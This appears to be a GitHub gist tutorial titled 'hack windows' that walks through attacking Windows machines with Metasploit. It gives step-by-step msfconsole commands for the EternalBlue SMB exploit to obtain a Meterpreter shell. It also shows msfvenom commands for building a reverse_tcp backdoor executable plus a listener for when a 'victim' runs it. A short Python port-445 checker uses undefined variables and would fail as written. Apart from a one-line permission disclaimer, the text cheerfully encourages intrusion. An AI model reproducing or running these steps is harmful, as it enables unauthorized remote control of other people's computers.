Skip to content

Instantly share code, notes, and snippets.

@fadhilsaheer

fadhilsaheer/hack_windows.md

Last active August 25, 2021 04:08
Show Gist options
  • Save fadhilsaheer/fad124da6294db90e1aa65286548c201 to your computer and use it in GitHub Desktop.
Save fadhilsaheer/fad124da6294db90e1aa65286548c201 to your computer and use it in GitHub Desktop.
Download ZIP
lets hack into windows πŸ‘¨β€πŸ’»
Raw
hack_windows.md

H4CK WINDOWS πŸ•΅οΈβ€β™‚οΈ

H4ck Windows using METASPLOIT πŸ±β€πŸ’»

DO NOT HACK ANYONE UNTILL YOU HAVE PERMISSION ❗


I assume you have a decent linux distro for hacking

I recommend Parrot OS or Kali

or at least Metasploit πŸ±β€πŸ’»


  • Target's firewall must be turned off
  • Attacker and victim must be on same network [ at least attacker must know IP address of victim ]

EternalBlue

EternalBlue is a critical vulnerability on _windows 7 and down based on SMB port 445


Scan the target an check if the targets SMB port is open or not

import socket

target_ip = "target ip" # speicfy your targets ip
target_port = 445

try:
    sock = socket.socket()
    sock.connect((ip, port))
    print("[+] PORT 445 IS OPEN, YOU CAN ATTACK !!")
except:
    print("[-] TARGET IS SAFE, TRY ANOTHER WAY TO ATTACK :(")

If targets port is open we can hack πŸ‘¨β€πŸ’»

open Metasploit

sudo msfconsole

after Metasploit started

use exploit/windows/smb/ms17_010_eternalblue

msf6 > use exploit/windows/smb/ms17_010_eternalblue

This is a Metasploit prebuild module , you can see the options by typing show options

msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

We will hit up with a lot of options but we are interested only on LHOST LPORT RHOSTS,

Metasploit is kind enough to auto configure LPORT & LHOST ,

you can change it whenever you need

set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set LPORT <ANY_PORT>

simply run the exploit by typing run or exploit

msf6 exploit(windows/smb/ms17_010_eternalblue) > run

If you done in the right way πŸ›£ You should get a Meterpreter shell back


CONGRATULATIONS YOU JUST H4CKED IN TO A SYSTEM 🎊πŸ₯³πŸ‘¨β€πŸ’»


Payloads 🦟

A payload is a set of malicious codes that carry crucial information that can be used to hack any device beyond limits that you can't imagine


We gonna make one πŸ‘¨β€πŸ’»

Some of the payload generating tools πŸ”¨

We are using Msfvenom because it comes preinstalled with metasploit framework, feel free to use other tools you could just read manuals for those πŸ˜„


In the case of payload based attack, we can't just hack into system without having any contact with it, we need a way to deliver payload to victim, but the joyful thing is it just works fine on any windows machine πŸ˜‰

Lets rock in roll


generate payload

msfvenom -p [payload_type] -a [victim_architecute] LHOST=[YOUR_IP] LPORT=[ANY_OF_YOUR_PORT] -o payload.exe

You need to replace the [..] part

...

There are many payload types in Msfvenom 🐍

I usually recommend and use

  • windows/x64/meterpreter/reverse_tcp for 64 bit devices
  • windows/meterpreter/reverse_tcp for 32 bit devices

You need to specify victim's architecture after -a

  • x64 for 64 bit devices
  • x86 for 32 bit devices

...

We successfully created a payload [ also known as backdoor, virus, trojan.. etc ]

We need to start a listener πŸ‘‚ on Meatsploit

fire up Metasploit

sudo msfconsole

use exploit/multi/handler

use exploit/multi/handler

set the options

set LHOST <IP-SET-IN-PAYLOAD>
set LPORT <PORT-SET-IN-PAYLOAD>

enter run

This will start the listener

wait to victim to execute the payload, You should get a Meterpreter shell back


Congratulations You Had Hacked Into Another System πŸ‘¨β€πŸ’»


Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment